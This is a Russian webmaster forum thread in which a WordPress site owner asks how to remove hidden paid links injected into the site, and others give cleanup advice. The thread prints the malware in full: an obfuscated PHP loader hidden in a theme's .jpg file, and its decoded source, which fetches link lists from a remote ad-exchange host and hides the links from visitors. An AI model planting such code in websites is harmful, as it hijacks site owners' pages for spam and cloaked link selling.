X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Неизвестный торгует автоссылками с моего сайта
MacTep
MacTep
Topic Starter сообщение 27.8.2013, 23:18; Ответить: MacTep
Сообщение #1


Частый гость
**

Группа: User
Сообщений: 88
Регистрация: 30.6.2010
Из: Россия
Поблагодарили: 12 раз
Репутация:   0  


Здравствуйте. У меня такая проблема возникла. Кто то начал торговать ссылками через какую то автобиржу у меня на сайте. Сначала обнаружил продажные ссылки, начал копаться, обнаружил код:
<?php @include ($_SERVER['DOCUMENT_ROOT'].'/wp-content/themes/exotic-vacation/images/bg_rss3.jpg');?>
удалил его и ссылки исчезли. Подозреваю что этого мало, а данный код вызывает код биржи откуда-то. Подскажите, как мне удалить весь левый код и что сделать чтобы такое не повторилось впредь? И как узнать через какую биржу некто торгует ссылками с моего сайта?


Поблагодарили: (1)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
rjksdfhe
rjksdfhe
сообщение 27.8.2013, 23:22; Ответить: rjksdfhe
Сообщение #2


Straight arms
*******

Группа: Active User
Сообщений: 2760
Регистрация: 21.4.2009
Из: Мытищи, МО, РФ
Поблагодарили: 1111 раз
Репутация:   163  


Верни ссылки назад, посмотри на них, откуда растут ноги, удалишь потом.
В этом инклюде и прячется ответ на твой вопрос.

Иначе - жди следующего случая, и начинай с начала.

Сообщение отредактировал rjksdfhe - 27.8.2013, 23:23
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
MacTep
MacTep
Topic Starter сообщение 27.8.2013, 23:32; Ответить: MacTep
Сообщение #3


Частый гость
**

Группа: User
Сообщений: 88
Регистрация: 30.6.2010
Из: Россия
Поблагодарили: 12 раз
Репутация:   0  


А как собственно это делается - смотреть откуда ноги растут? В исходном коде так отображается автоссылка:

<style>.oo_f{position:absolute;left:-9898px;}</style> <div class=oo_f> <a href="http://www.yugregion.ru/" target="_blank">Новости Ростовской области</a></div>


Как узнать откуда у нее ноги выросли? У меня знаний нехватает, прошу подсказать

Сообщение отредактировал MacTep - 27.8.2013, 23:34
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seowolf
seowolf
сообщение 27.8.2013, 23:41; Ответить: seowolf
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 286
Регистрация: 11.11.2012
Поблагодарили: 125 раз
Репутация:   16  


1. Смотрите все фалы движка на предмет даты последнего изменения
2. Все свежеизмененные файлы либо сканером на вирусы - либо вручную сравнивать с оригиналом и искать зловредный кусок
3. Отписать хостеру - возможно через его дыры что то залили
4. Какой движок? Ищем известные уязвимости и затыкаем - для всех популярных движков это все известно
5. Не забываем про архивацию БД и дистрибутива сайта

ну как бы очевидные вещи, но все же их забывают. А откуда ноги растут - вам ничего не даст, в пуаро играть смысл какой, вам нужно чтоб ваш сайт работал или наказать наглеца? Если последние то на всех патронов не хватит, дверь закройте плотно, без особой нужды никто ковырятся лишнего не будет, это взлом на автоматее скорее всего и шелл у вас на хосте.


--------------------
Бутик драгоценных камней. Удивительные драгоценные камни.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
сообщение 28.8.2013, 8:59; Ответить: mmkulikov
Сообщение #5


Старожил
******

Группа: Active User
Сообщений: 2122
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 610 раз
Репутация:   70  


(MacTep @ 27.8.2013, 21:18) *
$_SERVER['DOCUMENT_ROOT'].'/wp-content/themes/exotic-vacation/images/bg_rss3.jpg'

Сбросьте в ЛС этот скрипт - разберемся.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
MorKer
MorKer
сообщение 28.8.2013, 9:19; Ответить: MorKer
Сообщение #6


Участник
***

Группа: User
Сообщений: 229
Регистрация: 5.6.2009
Поблагодарили: 172 раза
Репутация:   66  


У Вас виртуальный хостинг, или ВПС/Сервер?
Обновляйте cms, удаляйте сомнительные темы/модули/плагины, в большинстве случаев, взламывают именно через эти уязвимости. Найдите файл .htaccess и проверьте его на наличие сторонних изменений.

Что кроме bg_rss3.jpg размещено в папке: /wp-content/themes/exotic-vacation/images/ ?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seobabai
seobabai
сообщение 28.8.2013, 14:15; Ответить: seobabai
Сообщение #7


Новичок
*

Группа: User
Сообщений: 29
Регистрация: 15.8.2013
Поблагодарили: 0 раз
Репутация:   -3  


Ограничь права на исполнение и поменяй пароли фтп и бд. Иначе так оно и будет постоянно заливаться к тебе.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
nika2012
nika2012
сообщение 28.8.2013, 14:44; Ответить: nika2012
Сообщение #8


Завсегдатай
*****

Группа: Active User
Сообщений: 810
Регистрация: 1.4.2011
Поблагодарили: 96 раз
Репутация:   14  


Как вариант, проверить с какого Ip идут ссылки и заблокировать в файле .htaccess.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
MacTep
MacTep
Topic Starter сообщение 28.8.2013, 15:24; Ответить: MacTep
Сообщение #9


Частый гость
**

Группа: User
Сообщений: 88
Регистрация: 30.6.2010
Из: Россия
Поблагодарили: 12 раз
Репутация:   0  


Такой скрипт был размещен в файле bg_rss3.jpg
<?php $mzjws = array('','s','n','c','a','u','6','i','l','b','r','v',')','$','z','t','(','4','f','g','d','_',';','o','e'); $xnhuevgv = $mzjws[3].$mzjws[10].$mzjws[24].$mzjws[4].$mzjws[15].$mzjws[24].$mzjws[21].$mzjws[18].$mzjws[5].$mzjws[2].$mzjws[3].$mzjws[15].$mzjws[7].$mzjws[23].$mzjws[2]; $injhxvd = $xnhuevgv('$v', $mzjws[24].$mzjws[11].$mzjws[4].$mzjws[8].$mzjws[16].$mzjws[19].$mzjws[14].$mzjws[7].$mzjws[2].$mzjws[18].$mzjws[8].$mzjws[4].$mzjws[15].$mzjws[24].$mzjws[16].$mzjws[9].$mzjws[4].$mzjws[1].$mzjws[24].$mzjws[6].$mzjws[17].$mzjws[21].$mzjws[20].$mzjws[24].$mzjws[3].$mzjws[23].$mzjws[20].$mzjws[24].$mzjws[16].$mzjws[13].$mzjws[11].$mzjws[12].$mzjws[12].$mzjws[12].$mzjws[22]); $injhxvd('DZfFrsVIEkQ/Z7rlhZk0KzMzezMyM1yz/fXz9imVKiHiRHVl4z/N1831mB3VP3m2VwT2v7IqlrL65z98Worfkmji4MUQAIhMRK5CRZwybljkSezXRZmCoR2/2Vg21MdWkMx+7uYt4D17YOXdNh6P9liMNki1EKUV5cGvFdFbBjfTT1aJBZmiNb7Xq1wY4cAy+gNuuaFZ
CzbvcUDXTcwwIWXpW5s492CadVtFe+RGTdjN5SIRROpoFDJzjfMtTymz7eAT+e92O9s9jB5SegyetsWx
+
VNDDz0NAghJmsmk9kkgrkGfMaCsYohgw9Bq+u2t+LYQR7yTUOvQxff6xEsixqwKq9l5cQUnfPt7n86Fc
w
KuJ9+iqLqv2tiDJBJmrdEnv/W9v05mZi63oJI3NvEsO8CMKacUq4bVzOxyMz5H6AWgKCEX4bHfXZwtftdZ3riLskxRP/T0WhhKQ4IwTGgSEke82fPt0/x8C8GTyh+KDVs/U4qPmZsgHm3b3X6IK1kFxxqVlRJu0kIEcuzEsSM6FYmpHqWZUAW7P+GH6myjnE6venmE/4SNp+P9TfJPIdkoXmWAUhMDpfg7C3VLL/UukENHO99GvV4JB84YFX4LjJ9b3uV5cJsR9WqPaNzinVH7p+UXKpeRAnSA2OcDL2C02mWRV81qAVUwoi
x04dDHGTBKAImKzCJKdqS12nW5xam7CFDPEvxWwD+LKLiztkUxiVc10Zmahyi7Uruejm6pRiqf+YaNXK
s
pirsOSlUqoVGsGkUnlai4FAS8LyomJCzFLXxNBMrcMEpErzz5bFFcnn+4dSfUEpOGCm8nDwIkEyeQMsO
Y
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
l
Bz+eK28mMun/k3FTVIJ1JcW3N9fJfaRh9W1RDweFHfYO5TYR3EcshyDS3urQirKZn9vUDWVzf5J9bDn7/4rCZzh3AMSRhzX6B+zh6q00KqVM4wFXHbYidjDvr55r15qp6E5G0oXRkgjl98SwEnvQD4kC81rf/2F2jU7gEPfsxCcI+LBxfJ2J2I8aZ3fmErLlxCZ0M1M7pfza2oA2Tcin9/i5VA+KpGftooj/8cxnk2wbyoTx+yuScJQa+nQFWanWPAK6vslP+Kn1yoqEiJE4A2vOHo0j0UBRozTgnCnzY6i/PH667/Sygd2HPmyhZ//7Ji7cmRMby1Z1rH8hIFYF0l/8NDLJyyJ2sRVMzZyvWjmeG9TxayltP/6A7K/nA/SJe4rgXNzO2DyG88a+y1DdkiE9GkJrwjPPjajvifVx6zDyOL27g6ytCmWSJBaMluaX80+i5UNLc//c2niwcNK+v3Bj7qxKQTNF3bGYLUQc8unGrkaT7P1mNOWDePdSUHUHA26nYoErOFP9+Q+ZF9jx4iFiSdD
WkLbKjC9QFYa18Wd0OoQVcDP9V1fELvIJ/tIO6UPNZDYmkzU80WfOcr7JXhkHMrXEeeX9l6K9u+f1ICtLP79/FV1gsUh98KwvmFXrkjWIzxGbANE7pEZ5UiU3eQgw8W40LFMLhr4NEBI50ZaAw+bkfW+stjOInoGXOmFU
5aYLhqkAC8o+FGnCRFDc7baILQ+G/he58M4N8q8pA5jpHuTT0fHby6J6q2xze7YttNIpA+NqHpDNsSi4Ez2VgvW17521PTxvF758z296tTahx/6EPirk+2yDU4SQUFtxeHNu7Zu/zulpvEy6VRjJ1ktFXrqN7v+862bEecEsCj4yM49Z+1cRR+KIfsREmRKcJAtgXEPGe6TyWpokX+ejl4wM
Hoa39sYWPNe14rYmIuRHjc1A9t+BNMpIdZr8G9XRcsvov+NOeKKTDESoFLTxtWl0sekzfmLJBye19oxy
M
AyuNP/ZEQtdQTbVtA77UN/YOCHumFrZGZ2HujH/hofXmBy5IaUpIF0O6dvCUfGWudg9eCt3KZV95Wg4I/A0IUZJRwBI8HLrWLY8tmTGzrTL20BBWglIyXGaSdCuXA6OKFWisqk9ym2HvkeYws0eNhQMzPVvEX396m
hLNK9mmphoXWYgQN+TIUBT/aqdCgh5iNzJlWrCco36cqnJRIXBH5ZbYNeDDe7HIOkWiLoymto43RzNCsAOZdMYJbyJDxE4OTAiJqkfY
sfrQ2U+fcYOhhwYJ3f4er2Ism2cvsXBdODEn2+rMSqPl9IK8ptoBxesWmb/Za8k/6s425rgDE2IrLASYTYNCFQnctgZCedxHji7NGoj/EqKpNQgK5o3ofkiwfTUnMoK0pwozJs2d3xdDfO1e6Rdg7M2GCqVbd7zbGj1HCPNqTUvMrQMqI9yiGToI
BIuu9mY81wp4qV6jOHxy3c9xA4MJEXfYXzJlufcCRB4z+knC6cENyev82A/wp5CNbZfgXRPSvg9HIzEwZMShWReM8VNFnqY8bP1Twjj92rupivn8y0mGgwX0tXKoLnNEzQgCCJAKBh9
zg6NJ7n1AiByGv6w8XxtHfAPAQF56psvqkoFQdcF0PScLpB8KNYFoRfI7K1L+ZGKbvBACatkOLJ+kicg
A
SxKphxHE1psHijIN7rx4CPgqOjx1o2Kg5CLNlyVEmTGrdgZQjVCg+ecp4MHkdBADtT/XiyNjIyvrjiKfOKbAeq0oCjeQP4jy+Wgo2RwGURaDt3gXG9QbABikAAEAQhMD//Pvvv//9Pw=='); ?>


В той папке были лишь рисунки к теме. Движок WP
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mmkulikov
mmkulikov
сообщение 28.8.2013, 19:15; Ответить: mmkulikov
Сообщение #10


Старожил
******

Группа: Active User
Сообщений: 2122
Регистрация: 21.9.2012
Из: СССР
Поблагодарили: 610 раз
Репутация:   70  


MacTep,
А это его раскодированный вариант 478.gif
<?php

$GLOBALS['_672463771_']=Array();  function _1571103316($i){$a=Array();return base64_decode($a[$i]);}
/*
  links-ads, Links Advert Solutions Company

  Released under the GNU General Public License

  Featured Products Listing Module

  Copyright (c) 2010 links-ads
*/

@error_reporting(0);
@ini_set('display_errors',0);
@ini_set('log_errors',0);

class ads_class{

    var $_nummer_schauen   = false;
    var $_alles_sagen       = false;
    var $_reparieren        = false;


    var $_kodierung            = 'UTF-8'; // windows-1251 UTF-8
    var $_ads_charset        = '';
    var $_fehler             = '';
    var $_host              = '';
    var $_request_uri       = '';
    var $_get_type = '';
    var $_senden_depens     = '';
    var $_ist_unser_s        = false;
    var $_sess_file         = '';
    var $_style = '';
    var $_links = array();
    var $_links_page = array();
    var $_delimiter = '';
    var $tmp = '/home/user1573/data/www/we-survive.ru/wp-content/themes/default/images/' ;  //'d:/web/temp/'  '/tmp/'   '/home/offerweb/data/mod-tmp'    '/var/www/teplodivo/data/tmp/'


    function ads_class($options = null){

        if (strlen($this->_host) == 0) {
            $this->_host = $_SERVER['HTTP_HOST'];
        }

        $this->_host = preg_replace('/^http:\/\//', '', $this->_host);
        $this->_host = preg_replace('/^www\./', '', $this->_host);
        $this->_request_uri = $_SERVER['REQUEST_URI'];

        if (isset($options['_kodierung']) && strlen($options['_kodierung'])) {
            $this->_kodierung = $options['_kodierung'];
        }
        if (isset($options['tmp']) && strlen($options['tmp']) != 0) {
            $this->tmp = $options['tmp'];
        }
        foreach ($_COOKIE as $key => $value){
            if (strpos($key, "e_cookie") !== false){
                $this->_ist_unser_s = true;
            }
        }
        $this->load_data();
    }

    function fetch_remote_file($host, $path) {

        $user_agent = 'ADS';
        @ini_set('allow_url_fopen',1);
        @ini_set('default_socket_timeout',6);
        @ini_set('user_agent',$user_agent);
        if (
            $this->_get_type == 'file_get_contents'
            ||
            (
                $this->_get_type == ''
                &&
                function_exists('file_get_contents')
                &&
                ini_get('allow_url_fopen') == 1
            )
        ) {
            $this->_get_type = 'file_get_contents';
            if ($data = @file_get_contents('http://' . $host . $path)) {
                return $data;
            }

        } elseif (
            $this->_get_type == 'curl'
            ||
            (
                $this->_get_type == ''
                &&
                function_exists('curl_init')
            )
        ) {
            $this->_get_type = 'curl';
            if ($ch = @curl_init()) {

                @curl_setopt($ch, CURLOPT_URL,              'http://' . $host . $path);
                @curl_setopt($ch, CURLOPT_HEADER,           false);
                @curl_setopt($ch, CURLOPT_RETURNTRANSFER,   true);
                @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT,   6);
                @curl_setopt($ch, CURLOPT_USERAGENT,        $user_agent);

                if ($data = @curl_exec($ch)) {
                    return $data;
                }

                @curl_close($ch);
            }

        } else {
            $this->_get_type = 'socket';
            $buff = '';
            $fp = @fsockopen($host, 80, $errno, $errstr, 6);
            if ($fp) {
                @fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
                @fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
                while (!@feof($fp)) {
                    $buff .= @fgets($fp, 128);
                }
                @fclose($fp);

                $page = explode("\r\n\r\n", $buff);

                return $page[1];
            }

        }

        return $this->raise_error('Error connect to server ' . $host . $path.', type: '.$this->_get_type);
    }

    function _read($filename){

        $fp = @fopen($filename, 'rb');
        @flock($fp, LOCK_SH);
        if ($fp) {
            clearstatcache();
            $length = @filesize($filename);
            $mqr = @get_magic_quotes_runtime();
            @set_magic_quotes_runtime(0);
            if ($length) {
                $data = @fread($fp, $length);
            } else {
                $data = '';
            }
            @set_magic_quotes_runtime($mqr);
            @flock($fp, LOCK_UN);
            @fclose($fp);



            return $data;
        }

        return $this->raise_error('Error read data from: ' . $filename);
    }

    function _write($filename, $data) {

        $fp = @fopen($filename, 'ab');
        if ($fp) {
            if (flock($fp, LOCK_EX|LOCK_NB)) {
                $length = strlen($data);
                ftruncate($fp, 0);
                @fwrite($fp, $data, $length);
                @flock($fp, LOCK_UN);
                @fclose($fp);

                if (md5($this->_read($filename)) != md5($data)) {
                    @unlink($filename);
                    return $this->raise_error('Error md5 check with write to: ' . $filename);
                }
            } else {
                return false;
            }

            return true;
        }

        return $this->raise_error('Error write to: ' . $filename);
    }

    function raise_error($e) {

        $this->_fehler = 'ERROR: ' . $e;
        if ($this->_alles_sagen == true) {
            print $this->_fehler;
        }
        return false;
    }

    function load_data(){

        $this->_sess_file = $this->tmp.'sess_' . md5(".".$this->_host);
        if (!is_file($this->_sess_file)) {

            if (@touch($this->_sess_file)) {
                @chmod($this->_sess_file, 0666);
            } else {
                return $this->raise_error('No file ' . $this->_sess_file . '. Creation error.');
            }
        }

        if (!is_writable($this->_sess_file)) {
            return $this->raise_error('Error access to: ' . $this->_sess_file);
        }

        @clearstatcache();

        $data = $this->_read($this->_sess_file);
        if (
            !$this->_ist_unser_s
            &&
            (
                filemtime($this->_sess_file) < (time()-3600)
                ||
                filesize($this->_sess_file) == 0
                ||
                @unserialize($data) == false
            )
        ){
            @touch($this->_sess_file, (time() - 3600 + 600));

            $path = '/code.php?user=jfb194uw2o5ntczyexlgka6i0d73h8rp&host=' . $this->_host;
            if (strlen($this->_kodierung)) {
                $path .= '&charset=' . $this->_kodierung;
            }

            if ($data = $this->fetch_remote_file('www.links-ads.net', $path)){
                if (substr($data, 0, 12) == 'FATAL ERROR:') {
                    $this->raise_error($data);
                } else {

                    $hash = @unserialize($data);
                    if ($hash != false) {

                        $hash['__ads_charset__'] = $this->_kodierung;
                        $hash['__last_update__'] = time();
                        $hash['__multi_site__'] =  true;
                        $hash['__fetch_remote_type__'] = $this->_get_type;
                        $hash['__php_version__'] = phpversion();
                        $hash['__server_software__'] = $_SERVER['SERVER_SOFTWARE'];

                        $data_new = @serialize($hash);
                        if ($data_new) {
                            $data = $data_new;
                        }
                        $this->_write($this->_sess_file, $data);
                    }
                }
            }
        }
        $this->_senden_depens = sprintf("%c%c%c%c",115,97,112,101);
        if (strlen(session_id())){
            $session = session_name() . '=' . session_id();
            $this->_request_uri = str_replace(array('?'.$session,'&'.$session), '', $this->_request_uri);
        }
        $this->set_data(@unserialize($data));
    }

    function _ergebnisse($n = null, $offset = 0) {

        if (is_array($this->_links_page)){

            $total_page_links = count($this->_links_page);

            if (!is_numeric($n) || $n > $total_page_links){
                $n = $total_page_links;
            }
            $point = 'noindex';
            $links = array();

            for ($i = 1; $i <= $n; $i++) {
                if ($offset > 0 && $i <= $offset) {
                    array_shift($this->_links_page);
                } else {
                    $links[] = array_shift($this->_links_page);
                }
            }

            $result = join($this->_delimiter, $links);

            if (
                strlen($this->_kodierung) > 0
                &&
                strlen($this->_ads_charset) > 0
                &&
                $this->_ads_charset != $this->_kodierung
                &&
                function_exists('iconv')
            ) {
                $new_html  = @iconv($this->_ads_charset, $this->_kodierung, $result);
                if ($new_html) {
                    $result = $new_html;
                }
            }

            if ($this->_ist_unser_s){
                $result = '<'.$this->_senden_depens.'_'.$point.'>'.$result.'</'.$this->_senden_depens.'_'.$point.'>';
            }

            $ergebnisse = $result;

        } else {
            $ergebnisse = $this->_links_page;
        }
        return $ergebnisse;
    }

    function _get_style(){
        return $this->_style;
    }

    function set_data($data){
        $this->_links = $data;

        if (isset($this->_links['2100499475757573'])){
            $this->_style = $this->_links['2100499475757573'];
        }

        if (isset($this->_links['434388477388475884'])){
            $this->_delimiter = $this->_links['434388477388475884'];
        }
        if (isset($this->_links['4888848858477284'])) {
            $this->_ads_charset = $this->_links['4888848858477284'];
        } else {
            $this->_ads_charset = '';
        }
        if (@array_key_exists($this->_request_uri, $this->_links) && is_array($this->_links[$this->_request_uri])) {
            $this->_links_page = $this->_links[$this->_request_uri];
        } else {
            if (isset($this->_links['2100499267309588']) && strlen($this->_links['2100499267309588'])) {
                if ($this->_ist_unser_s || $this->_nummer_schauen){
                    $this->_links_page = $this->_links['2100499267309588'];
                }
            }
        }
    }
}

$ads = new ads_class();
$ads_r = $ads->_ergebnisse();
$style = $ads->_get_style();
if (strlen($style) == 0){$style  =  '<style>.foot_st{display:none;}</style> <div class=foot_st>';}
if (strlen($ads_r)>0){

    if (isset($_SERVER['HTTP_REFERER'])){
        if (preg_match('%http://([^/]+)/%', $_SERVER['HTTP_REFERER'], $regs)){
            $data = str_replace('www.', '', $regs[1]);
            if ((substr(md5($data), 0, 5) === 'f10cd')||(substr(md5($data), 0, 5) === '2dde1')){
                echo "$ads_r"; //exit;
            }else{
                echo "$style $ads_r</div>";
            }
        }
        else{
            echo "$style $ads_r</div>";
        }
    }
    else{
        echo "$style $ads_r</div>";
    }
}

?>


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Продвижение сайта в ТОП выдачи с оплатой за позиции
6 Barselona 396 Сегодня, 10:48
автор: Barselona
Горячая тема (нет новых ответов) Качественный копирайт и наполнение Вашего сайта
Подходи, торопись, покупай живо...
251 DroBit 93881 Сегодня, 7:28
автор: DroBit
Открытая тема (нет новых ответов) Ваши первые действия после создания сайта
представьте что вы создали новый сайт
10 HavingingWorld 431 Вчера, 0:05
автор: JOHNY
Открытая тема (нет новых ответов) Ссылки с сайта по ремонту квартир
Только Москва
1 serb000 877 22.5.2018, 14:48
автор: Olopopscalius
Открытая тема (нет новых ответов) 90 статейных ссылок. Хорошие доноры для вашего сайта.
7 blogprogon 493 22.5.2018, 12:27
автор: blogprogon


 



RSS Текстовая версия Сейчас: 24.5.2018, 22:04
Дизайн